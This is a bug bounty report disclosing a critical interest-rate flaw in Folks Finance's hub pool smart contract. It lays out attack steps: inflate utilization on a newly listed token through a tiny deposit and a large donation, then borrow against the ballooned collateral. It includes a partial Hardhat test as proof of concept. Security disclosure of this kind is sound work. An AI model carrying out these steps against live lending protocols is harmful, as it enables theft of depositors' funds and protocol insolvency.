Boost _ Folks Finance 33311 - [Smart Contract - Critical] Infinite Interest rate bug

Submitted on Wed Jul 17 2024 12:14:00 GMT-0400 (Atlantic Standard Time) by @kankodu for Boost | Folks Finance

Report ID: #33311

Report type: Smart Contract

Report severity: Critical



  • Protocol insolvency

  • Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield



Here's the equation for utilisation that is being used currently U=TotalVariableBorrowAmount+TotalStableBorrowAmountTotalDeposits/TotalDeposits

When totalDeposits is lower than the totalBorrowed amount, the utilization can be much greater than 100%, which in turn makes borrowRates and depositRates very high.

Vulnerability Details

  • When a new token with CF > 0 is added, the attacker deposits 1e5 wei of its token, making TotalDeposits = 1e5.

  • Let's say the decimals for this newly added token are 1e18. The attacker then donates 1e18 wei of tokens directly to the HubPool and borrows.

    • This is allowed as there is no check for it in the borrow method. It makes the totalBorrows = 1e18.

    • Utilization is 1e13 in this case, which makes the interest rate ~4e31. This translates to 4 trillion percent per second.

  • After just a block, the attacker's original 1e5 deposits would have turned into a very large amount (in billions) due to the interest rate being an outrageous trillion percent per second.

  • The attacker goes ahead and borrows all the tokens against this deposit as CF for this token is non-zero.

Impact Details

  • Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield

  • Protocol insolvency



Proof of concept

Proof of Concept

Add below testcase in test/hub/HubPool.test.ts that shows the the interest rate is a very large amount when totalDeposits is way smaller than the totalBorrowedAmount

  it.only("infinite interest rate", async () => {
      const { loanManager, hubPool } = await loadFixture(deployHubPoolFixture);

      // set pool data with deposit total amount
      const depositTotalAmount = BigInt(1e5);
      const poolData = getInitialPoolData();
      poolData.depositData.totalAmount = depositTotalAmount;
      await hubPool.setPoolData(poolData);

      // update pool with borrow
      const amount = BigInt(1e18);
      const isStable = false;
      const updatePoolWithBorrow = await hubPool.connect(loanManager).updatePoolWithBorrow(amount, isStable);
      expect((await hubPool.getVariableBorrowData())[3]).to.equal(poolData.variableBorrowData.totalAmount + amount);
      await expect(updatePoolWithBorrow).to.emit(hubPool, "InterestRatesUpdated");

      expect((await hubPool.getVariableBorrowData())[4])

Last updated

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